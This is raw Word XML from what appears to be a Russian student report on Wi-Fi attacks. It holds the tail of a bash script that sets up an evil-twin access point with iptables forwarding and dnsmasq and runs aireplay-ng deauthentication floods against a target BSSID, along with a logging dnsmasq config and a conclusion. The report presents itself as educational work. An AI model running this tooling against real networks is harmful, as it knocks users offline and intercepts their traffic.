      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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iptables -P FORWARD ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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iptables -t nat -A POSTROUTING -o wlan0mon -j MASQUERADE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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1 &gt;  /proc/sys/net/ipv4/ip_forward</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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dnsmasq -C dnsmasq.conf -d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049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9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option4(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049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deauthType=''</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049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while [ -z $deauthType ]; do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049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"Would you like to run a basic deauth attack? (--deauth 100)"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049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"[1] Yes"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049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"[2] No"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049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read deauthType</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049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done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049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"you selected $deauthType"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049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$deauthType = 1 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049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sudo aireplay-ng --deauth 100 -a $bssid $interface &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049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9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p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049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if [ $deauthType = 2 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049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echo "Enter your aireplay-ng options, you must add the -a tag, and DO NOT include the interface"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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read options4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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sudo aireplay-ng $options4 $interface &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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fi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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wait</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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A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option5(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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"Killing airbase-ng"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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pkill airbase-ng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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"Killing dhcpd"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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pkill dhcpd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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"Killing aireplay-ng"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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pkill aireplay-ng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A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"Killing airodump-ng"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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pkill airodump-ng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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"sleeping..."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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sleep 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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B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menu(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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"What would you like to do?"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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"[0] set up interface"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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"[1] find the target"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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"[2] hone in on target"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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"[3] set up Evil-Twin AP"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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"[4] deauth the target AP"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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"[5] exit"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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read userInput</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B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4C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p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C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C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userAction(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C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case $userInput in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C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0) option0 ;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C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1) option1 ;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C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2) option2 ;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C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3) option3 ;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C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4) option4 ;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C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5) option5 ;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C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esac</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C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4C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echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C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echo "You MUST set your usb Wifi adapter in monitor mode first"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C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echo "Then follow the steps 1-5"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C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echo "This will help set up an Evil Twin AP"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D0">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echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D1">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echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D2">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echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D3">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sleep 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D4">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uI=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D5">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interface=''</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D6">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while [ -z $interface ]; do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D7">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option0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D8">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done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D9">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4DA">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until [ $uI = 5 ]; do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004DB">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menu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004DC">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uI=$userInput</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004DD">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#echo "you selected  $uI  hello"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004DE">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 xml:space="preserve">userAction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004DF">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:pBdr>
          <w:top w:space="0" w:sz="0" w:val="nil"/>
          <w:left w:space="0" w:sz="0" w:val="nil"/>
          <w:bottom w:space="0" w:sz="0" w:val="nil"/>
          <w:right w:space="0" w:sz="0" w:val="nil"/>
          <w:between w:space="0" w:sz="0" w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="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done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E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1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1t3h5sf" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Приложение 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E2">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Конфигурация dnsmasq для ложной точки доступа:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E3">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interface=at0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E4">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dhcp-range=10.0.0.20,10.0.0.250,255.255.255.0,12h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E5">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dhcp-option=3,10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E6">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dhcp-option=6,10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E7">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server=8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E8">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server=8.8.4.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E9">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server=64.6.64.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004EA">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server=64.6.65.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004EB">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log-queries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004EC">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log-dhcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004ED">
      <w:pPr>
        <w:keepNext w:val="1"/>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listen-address=127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.4d34og8" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E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0">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F1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.3znysh7" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Заключение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F2">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работы поставленная нами цель была достигнута. Реализованное программное обеспечение позволяет перехватывать, анализировать трафик, проводить соответствующие атаки, подменять точки доступа и отключать пользователей от них. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F3">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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Потенциальная опасность такого рода программного обеспечения достаточно велика, однако его наглядная реализация позволяет глубже понять возможные векторы планирования злоумышленника и в случае необходимости действовать на предупреждение возможного вреда. Все перехваченные в процессе работы данные принадлежат нам и носят лишь информативный характер. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F4">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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Одним из возможных способов применения системы мониторинга Probe Request запросов является отслеживание активности пользователей в определенных местах. Это может быть полезно как рекламным компаниям для обработки результатов и предоставления более актуальной в соответствии с интересами пользователя рекламы, так и в других отраслях, отслеживающих перемещение пользователей (к примеру, криминалистика).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId27"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ED0D7A"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:cs="Liberation Serif" w:eastAsia="Liberation Serif" w:hAnsi="Liberation Serif"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:aliases w:val="1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00ED0D7A"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Mangal" w:hAnsi="Times New Roman" w:eastAsiaTheme="majorEastAsia"/>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="29"/>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aliases w:val="1 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00ED0D7A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Mangal" w:hAnsi="Times New Roman" w:eastAsiaTheme="majorEastAsia"/>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="29"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00ED0D7A"/>
    <w:rPr>
      <w:color w:val="0000ff"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00ED0D7A"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine w:val="1"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00ED0D7A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Mangal"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine w:val="1"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00ED0D7A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00045370"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6" w:customStyle="1">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00045370"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:cs="Liberation Serif" w:eastAsia="Liberation Serif" w:hAnsi="Liberation Serif"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00045370"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8" w:customStyle="1">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00045370"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:cs="Liberation Serif" w:eastAsia="Liberation Serif" w:hAnsi="Liberation Serif"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00676C9A"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing w:val="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
